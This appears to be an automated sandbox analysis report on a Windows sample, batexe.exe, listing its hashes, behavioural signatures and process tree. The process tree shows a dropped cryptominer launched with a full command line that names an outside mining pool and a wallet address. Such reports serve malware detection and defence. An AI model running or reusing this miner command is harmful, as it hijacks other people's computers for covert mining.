Analysis
-
max time kernel
300s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
18/02/2024, 01:36
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2524 b2e.exe 1916 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1916 cpuminer-sse2.exe 1916 cpuminer-sse2.exe 1916 cpuminer-sse2.exe 1916 cpuminer-sse2.exe 1916 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3232-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3232 wrote to memory of 2524 3232 batexe.exe 84 PID 3232 wrote to memory of 2524 3232 batexe.exe 84 PID 3232 wrote to memory of 2524 3232 batexe.exe 84 PID 2524 wrote to memory of 2372 2524 b2e.exe 85 PID 2524 wrote to memory of 2372 2524 b2e.exe 85 PID 2524 wrote to memory of 2372 2524 b2e.exe 85 PID 2372 wrote to memory of 1916 2372 cmd.exe 88 PID 2372 wrote to memory of 1916 2372 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\9673.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\9673.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9673.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A1AE.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1916
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
26.4MB
MD5716db881fe18bf060bc2dc2bb68ca903
SHA12308a0c08894e7decf6a439718e8ab3ea8a115a9
SHA256522ad64d2325d322f402eb15eddf56de0d359bf87c209e81b00be4429949dd36
SHA5128491cb03f2eed3b4c77eb92cb99bf5d4de348ab142d6f016feb4b00e5fdb6ce516cd3adecc05ba71d682508a71afbc32aa9b049d53f15464ba4f7b061876c642
-
Filesize
5.4MB
MD5a2e29bccaf657112e4847c19638d3d9a
SHA120b8bab2c9a4e3a8f3d461c0fe87d4c382c8256d
SHA2560ebae6d16d8714de7f997a5ca0ddd56222fe36b65869faa7d8951e200f01afc2
SHA51289c86f8285270a4727717e7376ea5b323e4ff03fc581873dbe11e6d9524767ce279065f6308b976120b8d054265f16d1ec22d0c6113d9590675558ed63d513cc
-
Filesize
6.9MB
MD57a2ea07f1a974144b91ec5809c9ed033
SHA1c0c11f79a651ae738485afb1d305602aa2264e78
SHA256efe20180ff69f0c8db0c1383c90dad5b0564199225954d11e73437b5a0597a81
SHA51276a76702112c1f632e9425587118eefea1e50939adb165f03ae8dcff1dd3e50f2b9d765fef966a0a4a96b61d0e560a36fd1e79a67fbb536dc68e8776155d6999
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
2.3MB
MD54c04147c386ba8792ac6a03069572a8a
SHA1dda67789fc1d0f2469ca95f01a5c81034853ca6a
SHA256c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd
SHA512a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db
-
Filesize
192KB
MD58c933a591c8d0c1fec1da393587d09c9
SHA165f4672c0e0a6a20436fbaba57dac8c1a5fc5e51
SHA256c22ca427c0e65a0bb3e011afeba5244dd5a6e9c0327cfc7d15c4875083206b10
SHA51296b84267fd9b7c5587c74e30d5f647acabbf6b09feac19784de4e046619fcae78f2e6aa98eb7f06fe13197bfd9207b9044b09d5248480421ceb23cb01d511881
-
Filesize
182KB
MD5e423ac04a9396c97bc40e567c961fb22
SHA1d1e4663cb3e1f85ac17393df6c537b4210c2cac8
SHA2561e732c7ee3a53d731c8ce58472506548d442d772fdb623347e8461ed8586d8c2
SHA512bc785fc825573a932d1d20a904dc4813e4f939d1a1204cac90722ba14cdd806b9f38e5c5790d3ef0e4d140d10c26482a20e3bfea6ca32b5d733a6bee714c50e9
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
92KB
MD5c4fbaa64173efeb31677231ee1e91af5
SHA1b43e2481ce584f0f896ceed30db229e0d0190258
SHA2566816c935a112e39da2e08baa1131563c67edc7148913b04333fbc837e01d46a8
SHA5120e943f07bd99c20ed372592df8439d0e324e4dbee319c11fd7c53cca058b3dba228d685c9dacc98ce4355cf348c561cf9fde5cc673cfb83b9f2544b747a38723
-
Filesize
4.8MB
MD59b7005b0cd65f4de09b2b360f9c17ec5
SHA1bf6e47256a84284f189fb4fde155ae10b18bd97d
SHA256e2eee45e4abd2dc2f6a2c29b2012ce2e52f312dcc55056adef11d4678329fe2e
SHA5129283de9512760a1bf98e90b18cf794d0e717b9b9d26739e7b80c77c93ad3dae30c58254c909ea45d0b483c4a41359efe3ece7d1407a81c43c582023cc45d705a
-
Filesize
64KB
MD5e98583e2f3157ea2561f40a91a79b195
SHA1770932f48dbea7a78a3b21e3df65e329a27313ff
SHA256f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2
SHA512cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770
-
Filesize
64KB
MD56cccf65bd7d7ff5b53aeb882e15c462c
SHA1a9822b63ad70c6085ed1deda0fbe4bc5fe555f3d
SHA2561379cd6111c2c37cf16f2dd9b325118513e85c35543ba45e79deb504dd4c01d2
SHA512c174b5f8615131c2b86c57aee166744ee1fe02ff7c916195f2fde06684f467545a3fa4f88083335e2045d12727d774279dc8672ec352de3095b729aa5d1dedcb